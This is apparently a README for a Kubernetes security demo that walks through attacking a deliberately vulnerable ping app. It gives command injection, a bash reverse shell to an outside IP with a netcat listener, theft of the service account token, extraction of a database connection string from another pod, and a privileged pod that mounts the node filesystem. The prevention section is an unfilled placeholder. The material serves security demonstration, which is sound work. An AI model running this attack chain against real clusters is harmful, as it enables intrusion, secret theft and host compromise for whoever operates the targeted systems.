# Hijack a Kubernetes Cluster

This repo contains samples and code used to demo Container and Kubernetes security.

> This project contains anti-patterns!

## THIS IS A DRAFT VERSION

This repo is a draft. It will also contain detailed information on how to prevent such an attack.

## Environment

Details on how to scaffold the demo environment are available [here](./docs/env.md).

## Demo

### Play with the sample app

The sample app "ping me" pings a destination provided via the input field. Let's try it by submitting `127.0.0.1`. All good so far.

Let's try to inject a command after the IP address: `127.0.0.1; echo "I was here"`. As you see in the responce it worked.

Now we try whether `bash` is available: `; which bash`. And it is! Looks like we could try to hijack the container.

### Hijack the container

We will try to inject into the container via a reverse shell.

Therefore we will to open a connection on our attacker machine using netcat: `sudo nc -lnvp 80`

Now we inject the required command into our container. This allow us to connect a reverse shell to our open connection: `; bash -c 'bash -i >& /dev/tcp/20.86.25.78/80 0>&1'`.

And finally we have a reverse shell up and running.

### Hijack another container and access secrets

Let's see if we can access the API Server:

```bash
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CA=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt

curl --cacert ${CA} --header "Authorization: Bearer ${TOKEN}" -X GET https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api
```

It looks like we where able to authenticate and do have some access. Let's try whether we have access to see other Pods in our Namespace:

``` bash
NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

curl --cacert ${CA} --header "Authorization: Bearer ${TOKEN}" -X GET https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespaces/$NS/pods
```

It looks like we do not have access to our namespace. Let's check what namespace we are running in by executing `echo $NS`. Let's try the same curl command and try to access the default namespace:

``` bash
curl --cacert ${CA} --header "Authorization: Bearer ${TOKEN}" -X GET https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespaces/default/pods
```

This looks good! Let's install `kubectl` for easier access:

```bash
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"; chmod +x kubectl; mv kubectl /usr/bin/
```

Ok, let's see if we have access to other namespaces:

```bash
kubectl get pods -n default
```

Looks good. Let's try to list the Pod definition and see if we find some interesting environment variables:

```bash
kubectl get pods -n default -oyaml | grep env -A5
```

The "DB_STRING" env looks interesting. Let's see if we can get access to the secret itself via "kubectl exec":

```bash
kubectl exec -n default $(kubectl get pods -n default | grep another-app | awk '{ print $1 }') env | grep DB_STRING
```

Whoop! We have got access to the Database connections string! Whis this we might be able to access and even export some data.

### Hijack the Kubernetes Node

Let's try one more thing. Are we able to schedule a privileged pod in the default namespace?

```bash
kubectl run -i --image=ubuntu --privileged -n default ubuntu-pod -- bash &
```

Looks like we are allowed. We now have a running privileged Pod running with a root user. So let's try to connect to the pod:

```bash
kubectl exec -it -n default ubuntu-pod /bin/bash
```

This also worked. Now we should be able to mount our local node filesystem:

```bash
mount $(df | awk '{print $1}' | grep "/dev/sd") /tmp
```

We have now access to our local node filesystem. With some more work we would be also able to schedule workload beside Kubernetes using Containerd or even extract credentials to authenticate against our Public Cloud provider!

## How to prevent such attacks

tpd
